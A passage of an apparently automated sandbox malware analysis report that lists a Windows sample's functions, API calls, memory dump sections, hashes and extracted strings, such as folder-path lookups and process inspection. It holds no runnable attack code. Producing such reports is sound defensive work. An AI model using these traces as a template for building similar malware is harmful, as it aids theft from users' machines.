                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 3675c89aaac7e4bf513d3378d2b1284600e2121f734ac1cf293c303742f63245
                          • Instruction ID: 7564ff16f4fded24fea60b23033fc6fb145d6f62840a653eb56d940b242daf0a
                          • Opcode Fuzzy Hash: 3675c89aaac7e4bf513d3378d2b1284600e2121f734ac1cf293c303742f63245
                          • Instruction Fuzzy Hash: FD31B7B5E005159BCB08DF58C9906AEBBB6EB88350F14827EE905EB384DB34AD01CBD5
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425922
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 72ce411f60a9603ccc78830aed89491ef0d3d3f59f8d142ff26189d7cf510ab7
                          • Instruction ID: e608baf2c9de7f9df9e69f655c31c4c623940675a2f9202cf60dc1873617e265
                          • Opcode Fuzzy Hash: 72ce411f60a9603ccc78830aed89491ef0d3d3f59f8d142ff26189d7cf510ab7
                          • Instruction Fuzzy Hash: 91117070304B60CBD7218B2CF90071AB7E1ABD6760FA50A9FE0D187795C779E881C7A9
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0042A430,000000FF), ref: 00423D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423D27
                          • wsprintfA.USER32 ref: 00423D37
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          APIs
                          • __getptd.LIBCMT ref: 00429279
                            • Part of subcall function 004287FF: __amsg_exit.LIBCMT ref: 0042880F
                          • __amsg_exit.LIBCMT ref: 00429299
                          Similarity
                          • API ID: __amsg_exit$__getptd
                          • String ID: XuC$XuC
                          • API String ID: 441000147-965221565
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00408737
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          APIs
                            • Part of subcall function 0042781C: __mtinitlocknum.LIBCMT ref: 00427832
                            • Part of subcall function 0042781C: __amsg_exit.LIBCMT ref: 0042783E
                          • ___addlocaleref.LIBCMT ref: 00428756
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$XuC$xtC
                          • API String ID: 3105635775-1321301742
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E581
                          • lstrcat.KERNEL32(?,00FBD648), ref: 0041E59C
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00421FDF, 00421FF5, 004220B7
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0041EBF1
                          • lstrcat.KERNEL32(?,00FBE080), ref: 0041EC0C
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00424492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004244AD
                          • CloseHandle.KERNEL32(00000000), ref: 004244B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 004244E7
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          APIs
                          • __getptd.LIBCMT ref: 00428FDD
                            • Part of subcall function 004287FF: __amsg_exit.LIBCMT ref: 0042880F
                          • __getptd.LIBCMT ref: 00428FF4
                          • __amsg_exit.LIBCMT ref: 00429002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00429026
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          APIs
                          • lstrlen.KERNEL32(------,00405BEB), ref: 0042731B
                          • lstrcpy.KERNEL32(00000000), ref: 0042733F
                          • lstrcat.KERNEL32(?,------), ref: 00427349
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                          • Instruction ID: 41363a66702e245ea0d93190ad3999332c7a2a6a22fef51966e50eb72596cbfd
                          • Opcode Fuzzy Hash: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                          • Instruction Fuzzy Hash: F1F030746003128FCB249F75E858927B6F9EF45700318982EAC9AC3314E734D840CF60
                          APIs
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00413422
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 00413471
                          • lstrcpy.KERNEL32(00000000,?), ref: 00413497
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
                          • Instruction ID: 09a23efc2955e58daff6d96446485cce28000674c90205ea239b13ccfb24c7c0
                          • Opcode Fuzzy Hash: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
                          • Instruction Fuzzy Hash: 8B12FE70A012019FDB28CF19C554B66B7E5BF44719B19C0AEE809DB3A2D776DD82CF88
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 00417CAF
                            • Part of subcall function 00417D40: std::_Xinvalid_argument.LIBCPMT ref: 00417D58
                            • Part of subcall function 00417D40: std::_Xinvalid_argument.LIBCPMT ref: 00417D76
                            • Part of subcall function 00417D40: std::_Xinvalid_argument.LIBCPMT ref: 00417D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: 9137caf5e56f9db8e21bc54fd18e47bbb12782d2574234fdd7e0f8701df82468
                          • Instruction ID: cfddca24cbf199ee8c22e1db2e5c2c3fe7e5faf8939a0399b576d00cfd44b3cc
                          • Opcode Fuzzy Hash: 9137caf5e56f9db8e21bc54fd18e47bbb12782d2574234fdd7e0f8701df82468
                          • Instruction Fuzzy Hash: E131D3723082144BE7249A6CE880AABF7F9EF91760B20452BE5428B641E7659C8183EC
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00406F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00406F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: c9dfa962bb7e57710cc2f58d44713d5e626f21315498e2cd6befbcca0dc1d920
                          • Instruction ID: 7a26b4eb9058b202ee4789034d10588737f5a9f767f0f8198310e9166234b1c0
                          • Opcode Fuzzy Hash: c9dfa962bb7e57710cc2f58d44713d5e626f21315498e2cd6befbcca0dc1d920
                          • Instruction Fuzzy Hash: 37219AB06106029BEB209B20DC80BB773E8EB40704F44487DE946DBAC1EBB8E945CB64
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0042244C
                          • lstrlen.KERNEL32(00000000), ref: 004224E9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00422570
                          • lstrlen.KERNEL32(00000000), ref: 00422577
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 9b586c39a84837f4ef6d424367bbef8867376cba63c9cefb8156a295cb45ad2d
                          • Instruction ID: 007094e700ba5bb20fbb480f8e4670e1288f620269139d4d09a41b98e11082a2
                          • Opcode Fuzzy Hash: 9b586c39a84837f4ef6d424367bbef8867376cba63c9cefb8156a295cb45ad2d
                          • Instruction Fuzzy Hash: 4E81F271F00215ABDB10DF98ED44BAEB7B5AF84304F54807EE504A7381EBB99941CF98
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 004215A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 004215D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 00421611
                          • lstrcpy.KERNEL32(00000000,?), ref: 00421649
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 80d4689b917c98280545ae21ecec45d4bdb4df8f3cf95346bd8f9ad76fc87c25
                          • Instruction ID: d835a63f815e36da5ade85c26f075bb24775596f52dd66724b9a128e54fe9737
                          • Opcode Fuzzy Hash: 80d4689b917c98280545ae21ecec45d4bdb4df8f3cf95346bd8f9ad76fc87c25
                          • Instruction Fuzzy Hash: 382127B0701B029BD724DF2AE998A17B7F5AF54700B44492EA486D7B90DB78E841CFA4
                          APIs
                            • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000), ref: 0040162D
                            • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 0040164F
                            • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 00401671
                            • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 00401693
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401557
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401579
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
                          • Instruction ID: 80b5f1fa651da611af66416e481b020f72ab7f98df4cd08dbf14573642dabe07
                          • Opcode Fuzzy Hash: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
                          • Instruction Fuzzy Hash: 7931C674A01B02AFC724DF3AC988953B7E5BF48304704492EA896D7BA0DB74F811CF94
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 0040162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401671
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401693
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
                          • Instruction ID: 77a9aadbbd26ea48150a62d0fa0b2c9b2127a70dadc2ffa25d6a6684b0360a2a
                          • Opcode Fuzzy Hash: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
                          • Instruction Fuzzy Hash: 291112B46117029BD7149F36D94C927B7F8BF44305704093EA496E3B90DB79E801CB94